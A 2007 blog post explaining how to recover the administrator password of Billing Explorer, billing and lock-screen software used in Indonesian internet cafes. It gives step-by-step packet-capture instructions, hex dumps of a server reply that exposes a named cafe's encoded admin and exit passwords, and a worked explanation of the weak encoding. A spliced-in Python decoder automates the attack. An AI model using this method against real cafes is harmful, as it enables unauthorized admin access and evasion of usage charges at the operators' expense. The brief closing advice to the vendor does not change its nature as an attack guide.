<body>

Sunday, December 02, 2007

How to hack Billing Explorer 2006/2007

By: Kevin Haritmonds, Dec 2007

Last week I was curious about Billing Explorer (http://www.billingexplorer.com/). Billing Explorer is billing software used in many game centers / internet cafes in Indonesia. It basically locks the screen and keyboard until a guest logs in, and from then on it counts usage time for later charging.

My objective is to get the administrator password for this software. There are several articles about Billing Explorer that you may find on the internet, but none of them work for version 2006 and above, since those versions introduced "encrypted data communication" *yeah right*. So I did my own research. Please read the article below at your own responsibility.

Here's how I hacked the software:
1. Log in as a guest on Billing Explorer. Hey, do not use your real name haha..

2. Install Ethereal (http://www.ethereal.com/). This software can capture and display all network packets to and from your PC.

3. Start capturing network packets in Ethereal.

4. Log off from Billing Explorer (yes, you will be charged for it, but it's worth it *haha*).

5. Click "Admin". Billing Explorer will ask for the administrator password. This is the password we are looking for. Enter anything; it will fail, but not for long *haha*.

6. Login again on Billing Explorer.

7. Stop capturing packets in Ethereal.

8. Analyze the packets exchanged between our PC and the server; you'll find communication like this:

Client --> Server port 1500:
0000 00 14 2a b2 36 be 00 d0 59 c5 03 36 08 00 45 00 ..*.6...Y..6..E.
0010 00 33 00 b0 40 00 80 06 2c 8c 0a 60 5c 65 0a 60 .3..@...,..`\e.`
0020 5c 64 04 03 05 dc 85 4f 6b ab b1 9f f8 52 50 18 \d.....Ok....RP.
0030 fc 6f 7b b0 00 00 58 4a 36 24 77 77 77 34 24 31 .o{...XJ6$www4$1
0040 24 $

Server port 1500 --> Client:
0000 00 d0 59 c5 03 36 00 14 2a b2 36 be 08 00 45 00 ..Y..6..*.6...E.
0010 00 c8 8b de 40 00 80 06 a0 c8 0a 60 5c 64 0a 60 ....@......`\d.`
0020 5c 65 05 dc 04 03 b1 9f f8 52 85 4f 6b b6 50 18 \e.......R.Ok.P.
0030 fc a2 2a 2d 00 00 59 41 36 24 77 77 77 34 24 30 ..*-..YA6$www4$0
0040 38 38 31 30 34 31 30 34 31 30 34 31 30 34 31 30 8810410410410410
0050 34 24 49 6e 74 65 72 6e 65 74 20 4d 65 64 69 74 4$Internet Medit
0060 65 72 61 6e 69 61 24 41 70 61 72 74 65 6d 65 6e erania$Apartemen
0070 20 4d 65 64 69 74 65 72 61 6e 69 61 20 4a 61 6b Mediterania Jak
0080 61 72 74 61 24 45 6d 61 69 6c 20 69 6e 66 6f 5f arta$Email info_
0090 30 30 38 40 79 61 68 6f 6f 2e 63 6f 6d 20 2d 20 008@yahoo.com -
00a0 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 6c 6c 69 http://www.billi
00b0 6e 67 65 78 70 6c 6f 72 65 72 2e 63 6f 6d 24 30 ngexplorer.com$0
00c0 38 38 31 30 34 31 30 34 31 31 32 24 50 50 50 24 88104104112$PPP$
00d0 36 32 24 34 33 33 62$433

What's this all about? Well, you see, this is TCP/IP communication between the Billing Explorer client and server. Basically the messages translate like this:

- Client --> Server port 1500:
"Tell me all information you can give about myself". It is represented with a string "XJ6$www4$1$".

- Server --> Client:
"Okay, okay. Your administrator password is 088104104104104104 (this is still in encrypted form). The internet cafe name is Internet Mediterania. The address is Apartemen Mediterania Jakarta. The e-mail is info_008@yahoo.com. And the exit password is 088104104112." It is represented with the string "YA6$www4$088104104104104104$Internet Mediterania$Apartemen Mediterania Jakarta$Email info_008@yahoo.com - http://www.billingexplorer.com$088104104112$PPP$62$433".

Hmm, this is interesting.. So how can we decrypt these numbers to reveal the real administrator password? After doing some research, here's what I found:
- Password 008 (the default password): 090106106114
- Password 007: 090106106113
- Password 0123456: 091107108109110111112113
- Password abc123: 088153154155105106107

Found the algorithm already? Yeah, the first 3 digits represent a "seed" (090, 090, 091 and 088 respectively in the examples above). Then each character of the password is found by subtracting the seed from each following group of 3 digits. Let's try it on the examples:
- 090106106114: Seed "090". Password: 1st char: 106 - 090 = 16. 2nd char: 106 - 090 = 16. 3rd char: 114 - 090 = 24.
- 091107108109110111112113: Seed "091". Password: 1st char: 107 - 091 = 16. 2nd char: 108 - 091 = 17. 3rd char: 109 - 091 = 18. 4th char: 110 - 091 = 19. 5th char: 111 - 091 = 20. 6th char: 112 - 091 = 21. 7th char: 113 - 091 = 22.
- 088153154155105106107: Seed "088". Password: 1st char: 153 - 088 = 65. 2nd char: 154 - 088 = 66. 3rd char: 155 - 088 = 67. 4th char: 105 - 088 = 17. 5th char: 106 - 088 = 18. 6th char: 107 - 088 = 19.

Next, converting these numbers to the real password is very easy: 16 means "0", 17 means "1", 18 means "2", etc., and 65 means "a", 66 means "b", 67 means "c", etc. (each value is just the character's ASCII code minus 32). Pretty simple, huh?! So can you decrypt "088104104104104104" now? Yes, it's 00000.
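To make clear why this "encryption" is no stronger than plaintext, here is an added example (not code from the post or from Billing Explorer) that models the scheme exactly as described above and checks it against the post's four known password pairs; the field positions in the server record are assumed from the post's own reading of the capture.

```python
# Added example: models the Billing Explorer 2006/2007 password encoding as
# the post describes it. Decoding needs no secret at all: the "seed" is the
# first group, so every record carries everything needed to undo it.
# Field indexes below are an assumption taken from the post's interpretation.

def decode_password(blob: str) -> str:
    """First 3-digit group is the seed; each following group is
    seed + (ASCII code - 32) of one password character."""
    if len(blob) < 6 or len(blob) % 3 != 0 or not blob.isdigit():
        raise ValueError("expected a seed plus groups of three decimal digits")
    groups = [int(blob[i:i + 3]) for i in range(0, len(blob), 3)]
    seed, body = groups[0], groups[1:]
    chars = []
    for value in body:
        offset = value - seed            # 16 -> '0', 65 -> 'a', as in the post
        if not 0 <= offset < 95:         # must land in printable ASCII 0x20..0x7e
            raise ValueError(f"group {value:03d} is not seed + printable char")
        chars.append(chr(offset + 32))
    return "".join(chars)

def encode_password(password: str, seed: int) -> str:
    """Forward direction, used only to confirm the model round-trips."""
    return f"{seed:03d}" + "".join(f"{seed + ord(c) - 32:03d}" for c in password)

def parse_server_record(record: str) -> dict:
    """Split the '$'-delimited server reply into the fields the post names.
    Index assignments are an assumption based on the post, not vendor docs."""
    f = record.split("$")
    return {
        "admin_password_encoded": f[2],
        "cafe_name": f[3],
        "address": f[4],
        "contact": f[5],
        "exit_password_encoded": f[6],
    }

# The server reply from the post's capture (ASCII column of the hex dump).
SERVER_RECORD = ("YA6$www4$088104104104104104$Internet Mediterania"
                 "$Apartemen Mediterania Jakarta$Email info_008@yahoo.com - "
                 "http://www.billingexplorer.com$088104104112$PPP$62$433")

if __name__ == "__main__":
    fields = parse_server_record(SERVER_RECORD)
    # Same result the post reaches by hand: the record reveals the password.
    print("admin password:", decode_password(fields["admin_password_encoded"]))
```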

Well, I suggest that the creator of Billing Explorer think of a more secure way of communicating the administrator password from the server to its clients. One good method is to use public/private key cryptography (e.g. RSA); another, simpler one is to send a hash (e.g. MD5) rather than the password itself.

Cheers..